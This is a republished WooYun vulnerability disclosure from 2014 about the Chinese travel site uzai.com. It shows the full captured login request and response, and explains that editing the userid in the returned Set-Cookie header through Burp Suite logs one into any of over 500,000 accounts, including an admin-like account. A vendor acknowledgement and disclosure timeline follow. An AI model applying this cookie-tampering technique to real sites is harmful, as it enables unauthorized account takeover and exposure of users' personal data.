2014-05-30:细节已通知厂商并且等待厂商处理中
2014-06-02:厂商已经确认,细节仅向厂商公开
2014-06-12:细节向核心白帽子及相关领域专家公开
2014-06-22:细节向普通白帽子公开
2014-07-02:细节向实习白帽子公开
2014-07-14:细节向公众公开
看我如何随意登录悠哉旅游网50多万用户帐号
详细说明:response欺骗实例应用:
随意登录悠哉旅游网50多万用户任意帐号
首先说明一下,注册手机账户通常都是要手机号短信验证,而悠哉旅游网却略过了这一步,只要输入手机帐号无需验证直接注册成功(设计缺陷)
于是我直接注册了该帐号 (18688888888:wooyun)
在提交登录的时候抓包截包,获取到如下post请求:
POST /reguser HTTP/1.1
Host: u.uzai.com
Proxy-Connection: keep-alive
Content-Length: 132
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://u.uzai.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://u.uzai.com/reguser
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uzaiURLRefer=http%3A%2F%2Fwww.uzai.com%2F; uzaiNewURLRefer=http%3A%2F%2Fwww.uzai.com%2F; SERVERID=app32; uzwDangDiYou=1; history_cookie=76313_uh_%u3010%u516D%u6708%u3011%u97E9%u56FD%u9996%u5C14+%u6D4E%u5DDE%u6B22%u4E505%u65E5%u6E38%uFF08%u4E1C%u822A%uFF09_uh_3%u98DE%u4E0D%u8D70%u56DE%u5934%u8DEF%uFF0C%u97E9%u56FD%u7ECF%u5178%u666F%u70B9%uFF0C%u4E1C%u5927%u95E8+%u660E%u6D1E%u81EA%u7531%u8D2D%u5A31%u3002_uh_http://sh.uzai.com/tour-76313.html_uh_http://r.uzaicdn.com/pic/11043/m/w160/h120/t1_uh_3174_uh_2014/5/30 ä¸å9:58:30; ASP.NET_SessionId=griefnhaholjs3qwi3zcuck3; __pztm_ref.4bd3852a51f48d59272566a168b43ea1=%5B1401459603689%2C%22http%3A%2F%2Fwww.uzai.com%2F%22%5D; __pztm_lp=null|http://www.uzai.com/; _ga=GA1.2.1414981402.1401458306; __pztm_cv=DGPCCBIC3GNG9EFG.1401458305956.1.1401461828933.1401458305956.1401458305956; __pztm_ses.4bd3852a51f48d59272566a168b43ea1=*; Hm_lvt_c6ca6ea4f6a82938e24232a7a3da3949=1401458306; Hm_lpvt_c6ca6ea4f6a82938e24232a7a3da3949=1401461829; Hm_lvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401458306; Hm_lpvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401461829
hidden_UpPageURL=http%3A%2F%2Fwww.uzai.com%2F&username=18688888888&password=wooyun&txtPassCode=&txtCardNum=&cooktime=1&keyUserCount=
利用burpsuite中的Do intercept-Response to this request功能
Forward当前数据包,收到response响应:
HTTP/1.1 302 Found
Cache-Control: public
Content-Type: text/html; charset=utf-8
Location: http://www.uzai.com/
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: user=userName=uzai503483&Email=&Mobile=18688888888&realname=&userid=503483&nickname=&headUrl=&islogin=1&userGrade=A; domain=uzai.com; expires=Fri, 06-Jun-2014 15:02:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 30 May 2014 15:02:48 GMT
Connection: close
Content-Length: 137
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.uzai.com/">here</a>.</h2>
</body></html>
修改Set-Cookie中的userid 再Forward出去就可以秒进他人账户,userid=503483 50多万..
进个userid=1的用户 用户名:uzaiadmin
这个应该是测试帐号,其他各种敏感信息
我还测试了好几个帐号,不一一示例,仅证明影响
程序猿懂得
版权声明:转载请注明来源 魇@乌云漏洞回应 厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-06-02 12:03
厂商回复:谢谢,我们会抓紧处理的。
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;